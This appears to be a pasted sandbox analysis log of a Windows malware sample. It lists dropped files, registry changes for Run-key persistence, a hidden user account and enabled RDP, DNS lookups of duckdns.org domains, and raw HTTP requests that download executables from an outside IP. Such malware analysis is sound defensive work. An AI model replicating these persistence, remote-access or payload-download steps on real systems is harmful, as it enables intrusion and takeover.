- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT277IUZQGETZPBWEMRU.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5496890",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GIP7DEH2ZWQ1M67P0IFF.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportArchive\\AppCrash_qDABnKekr.exe_bea1e58056a849b25f9ce14267c2eac9f86898a8_0c988def\\Report.wer",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.38.12",
- "C:\\Users\\user\\AppData\\Roaming\\IhBGrhG.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HMHQ8PLQENE0CHLORZDB.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP",
- "\\??\\Nul",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5564453",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI"
- * Deleted Files:
- "C:\\ProgramData\\images.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9SB1EHE2O2TT8HT5MNLA.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2024.5405437",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2024.5405437",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2024.5405437",
- "C:\\Users\\user\\AppData\\Roaming\\Fg.bFic.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.832.5409109",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.832.5409109",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.832.5409109",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5431031",
- "C:\\Users\\user\\AppData\\Roaming\\zw.nJe..tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.5502687",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.5502687",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.5502687",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
- "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe",
- "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\DSL Subsystem\\dslss.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2512.5511687",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2512.5511687",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2512.5511687",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5496890",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1624.5543906",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1624.5543906",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1624.5543906",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.3892.5526703",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3892.5526703",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.3892.5526703",
- "C:\\Users\\user\\AppData\\Roaming\\IhBGrhG.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.3252.5575828",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3252.5575828",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.3252.5575828",
- "C:\\ProgramData\\images.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5564453",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2016.5574718",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2016.5574718",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2016.5574734"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\inst",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\BmEIHkw",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\rudp",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\rpdp",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\kB_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\FileDirectory",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VYEDE946XH",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\DSL Subsystem",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.vbs\\OpenWithProgids\\VBSFile",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\qDABnKekr_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\qDABnKekr_RASAPI32\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
- * DNS Communications:
- "type": "A",
- "request": "google.com",
- "answers":
- "data": "172.217.5.110",
- "type": "A"
- "type": "A",
- "request": "dultrasolutions.duckdns.org",
- "answers":
- "data": "170.130.31.104",
- "type": "A"
- "type": "A",
- "request": "absolutezeros.duckdns.org",
- "answers":
- "data": "79.134.225.32",
- "type": "A"
- * Domains:
- "ip": "79.134.225.32",
- "domain": "absolutezeros.duckdns.org"
- "ip": "170.130.31.104",
- "domain": "dultrasolutions.duckdns.org"
- "ip": "172.217.5.110",
- "domain": "google.com"
- * Network Communication - ICMP:
- "src": "169.254.255.254
- "dst": "1.2.3.4",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- "src": "169.254.255.254
- "dst": "1.2.3.4",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- "src": "169.254.255.254
- "dst": "1.2.3.4",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- "src": "169.254.255.254
- "dst": "1.2.3.4",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://185.62.188.169/paso111.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "185.62.188.169",
- "version": "1.1",
- "path": "/paso111.exe",
- "data": "GET /paso111.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 185.62.188.169\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://185.62.188.169/turnx.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "185.62.188.169",
- "version": "1.1",
- "path": "/turnx.exe",
- "data": "GET /turnx.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 185.62.188.169\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment